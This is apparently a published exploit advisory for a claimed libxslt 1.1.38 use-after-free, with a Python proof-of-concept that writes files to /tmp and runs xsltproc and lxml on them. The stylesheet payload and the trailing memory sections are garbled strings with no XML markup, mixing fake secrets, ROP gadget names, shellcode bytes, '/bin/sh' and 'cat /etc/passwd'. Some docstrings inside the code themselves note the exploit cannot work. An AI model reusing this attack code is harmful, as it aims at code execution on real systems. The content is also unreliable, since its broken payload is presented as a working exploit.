=============================================================================================================================================
| # Title : libxslt Key Data Storage 1.1.38 memory corruption |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.2 (64 bits) |
| # Vendor : https://gitlab.gnome.org/GNOME/libxml2/-/wikis/home |
=============================================================================================================================================
[+] References : https://packetstorm.news/files/id/207871/
[+] Summary :
The vulnerability occurs due to improper handling of Result Value Trees (RVTs) when evaluating XSLT keys with certain XPath axes:
Global variables (xsl:variable) are stored as RVTs in a linked list using prev/next pointers.
XSLT keys (xsl:key) using the preceding:: axis traverse across RVT boundaries via these pointers.
Memory corruption occurs when RVTs are freed while key tables still retain references to their nodes.
[+] Affected Version : All versions up to and including 1.1.38
[+] POC : python poc.py
#!/usr/bin/env python3
# libxslt_uaf_exploit.py
# استغلال ثغرة Use-After-Free في libxslt عبر Python lxml
import lxml.etree as ET
import sys
import os
import subprocess
from base64 import b64encode
class LibxsltUAFExploit:
    """Driver for the advisory's proof-of-concept run.

    The methods write two (optionally three) fixed-path text files under
    /tmp, feed them to xsltproc and/or lxml, and delete them again.  Every
    method reports progress on stdout in the author's original wording and
    catches its own exceptions, so apart from the file writes nothing here
    raises to the caller.

    NOTE(review): the file locations are fixed, predictable paths in the
    shared /tmp directory and are opened with a plain ``open(path, 'w')``,
    so a pre-existing file or symlink at those names is followed rather
    than refused; ``tempfile.mkstemp`` would avoid that.
    """

    # One set of paths shared by the writer, runner and cleanup methods.
    _XSLT_PATH = '/tmp/exploit.xsl'
    _XML_PATH = '/tmp/target.xml'
    _ADVANCED_PATH = '/tmp/advanced_exploit.xsl'

    def __init__(self):
        # Both buffers stay None until the matching create_* method runs.
        self.xslt_content = None
        self.xml_content = None

    @staticmethod
    def _write(path, text):
        """Write *text* to *path*, truncating any existing file (default encoding)."""
        with open(path, 'w') as handle:
            handle.write(text)

    def create_malicious_xslt(self):
        """Store the advisory's stylesheet text on self and write it to /tmp/exploit.xsl.

        As reproduced here the text contains no XML markup at all (no '<'
        characters), so an XML parser cannot treat it as a stylesheet and
        no xsl:key is ever evaluated from it.
        """
        self.xslt_content = '''
adminSuperSecret@123!Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9AKIAIOSFODNN7EXAMPLE4111-1111-1111-111112/25123
AAAAAAAA
0x7f8a1b002000
BBBBBBBB
0x7f8a1b002100pop rdi; retsystem@plt\\x31\\xc0\\x48\\xbb\\xd1\\x9d\\x96\\x91\\xd0\\x8c\\x97\\xff'''
        self._write(self._XSLT_PATH, self.xslt_content)
        print("[+] تم إنشاء ملف XSLT الضار")

    def create_target_xml(self):
        """Store the input document text on self and write it to /tmp/target.xml.

        Like the stylesheet text, this is plain text without markup.
        """
        self.xml_content = '''
Vulnerable App1.0Linuxtest_user'''
        self._write(self._XML_PATH, self.xml_content)
        print("[+] تم إنشاء ملف XML الهدف")

    def exploit_via_python_lxml(self):
        """Parse both /tmp files with lxml and apply the stylesheet to the document.

        The document is parsed first, then the stylesheet, so a parse
        error on the document is the one reported when both are invalid.
        Any exception is printed; on success the result is printed.
        """
        print("[+] محاولة الاستغلال عبر Python lxml...")
        try:
            document = ET.parse(self._XML_PATH)
            stylesheet = ET.XSLT(ET.parse(self._XSLT_PATH))
            output = stylesheet(document)
            print("[+] نتيجة الاستغلال:")
            print(str(output))
        except Exception as e:
            print(f"[-] فشل الاستغلال عبر lxml: {e}")

    def exploit_via_xsltproc(self):
        """Run ``xsltproc /tmp/exploit.xsl /tmp/target.xml`` with a 10 s timeout.

        stdout is always printed, stderr only when non-empty.  The return
        code is never inspected, so a process that exits abnormally is
        reported exactly like a normal run; only a timeout gets its own
        message.  Any other exception is printed.
        """
        print("[+] محاولة الاستغلال عبر xsltproc...")
        command = ['xsltproc', self._XSLT_PATH, self._XML_PATH]
        try:
            proc = subprocess.run(command, capture_output=True, text=True, timeout=10)
            print("[+] stdout:")
            print(proc.stdout)
            if proc.stderr:
                print("[+] stderr (قد يحتوي على معلومات التصحيح):")
                print(proc.stderr)
        except subprocess.TimeoutExpired:
            print("[-] انتهت مهلة التنفيذ - احتمال تحطم التطبيق")
        except Exception as e:
            print(f"[-] خطأ في التنفيذ: {e}")

    def check_vulnerability(self):
        """Report whether the local toolchain can run the PoC.

        Despite the name, no version is compared against 1.1.38: the method
        returns True whenever ``xsltproc --version`` mentions libxslt on
        stderr, and False when xsltproc is missing, when lxml cannot be
        imported, or when anything else raises.  The lxml version is only
        printed, never evaluated.
        """
        print("[+] فحص إصدار libxslt...")
        try:
            import lxml  # third-party; an ImportError lands in the handler below
            print(f"[+] إصدار lxml: {lxml.__version__}")
            probe = subprocess.run(['xsltproc', '--version'],
                                   capture_output=True, text=True)
            # xsltproc writes its version banner to stderr.
            if 'libxslt' not in probe.stderr:
                print("[-] xsltproc غير مثبت")
                return False
            print("[+] xsltproc مثبت:")
            print(probe.stderr)
            return True
        except Exception as e:
            print(f"[-] خطأ في الفحص: {e}")
            return False

    def advanced_exploit(self):
        """Write a second text file to /tmp/advanced_exploit.xsl and run xsltproc on it.

        The content is again markup-free plain text.  Unlike
        exploit_via_xsltproc no timeout is passed, so a hung xsltproc
        blocks here indefinitely.  Errors from the subprocess call are
        printed; an error writing the file propagates to the caller.
        """
        print("[+] بدء الاستغلال المتقدم...")
        staged_text = '''
STAGE1_PAYLOAD
CHUNK_ACHUNK_B
STAGE2_PAYLOAD
CHUNK_CCHUNK_DTRIGGEREDCONFIRMED'''
        self._write(self._ADVANCED_PATH, staged_text)
        command = ['xsltproc', self._ADVANCED_PATH, self._XML_PATH]
        try:
            proc = subprocess.run(command, capture_output=True, text=True)
            print("[+] نتيجة الاستغلال المتقدم:")
            print(proc.stdout)
        except Exception as e:
            print(f"[-] فشل الاستغلال المتقدم: {e}")

    def cleanup(self):
        """Delete whichever of the three /tmp files currently exist.

        The success line is printed even when nothing was removed; an
        error during removal is printed rather than raised.
        """
        try:
            for path in (self._XSLT_PATH, self._XML_PATH, self._ADVANCED_PATH):
                if os.path.exists(path):
                    os.remove(path)
            print("[+] تم تنظيف الملفات المؤقتة")
        except Exception as e:
            print(f"[-] خطأ في التنظيف: {e}")
def main():
    """Run the PoC end to end: probe the toolchain, write files, run, clean up.

    Returns early when check_vulnerability() reports False (which, per that
    method, means xsltproc or lxml was not usable rather than a version
    result).  The /tmp files are removed in ``finally`` whether the runs
    succeed, fail or are interrupted.
    """
    exploit = LibxsltUAFExploit()
    banner = "=" * 50
    print(banner)
    print("مستغلة ثغرة libxslt UAF - Python Edition")
    print(banner)
    if not exploit.check_vulnerability():
        print("[-] النظام لا يبدو مصاباً")
        return
    separator = "\n" + "=" * 30
    try:
        exploit.create_malicious_xslt()
        exploit.create_target_xml()
        exploit.exploit_via_xsltproc()
        print(separator)
        exploit.exploit_via_python_lxml()
        print(separator)
        exploit.advanced_exploit()
    except KeyboardInterrupt:
        print("\n[!] تم إيقاف الاستغلال بواسطة المستخدم")
    except Exception as e:
        print(f"[-] خطأ غير متوقع: {e}")
    finally:
        exploit.cleanup()


if __name__ == "__main__":
    main()
====================================
[+] 1 Setting up memory structures :
====================================
Important DataOther Data
=======*****=====
value1value2value3data1data2Sensitive Information
=========******=================
[+] Manipulating Memory Planning
================================
Admin123!SECRET-TOKEN-ABCD4111111111111111:
=========******==================
[+] Exploiting the Use-After-Free
=================================
=========******==================
[+] Exploiting the code
=================================
bin/sh0x43434343AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABEFORE_FREE0x58585858systemcat /etc/passwd
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================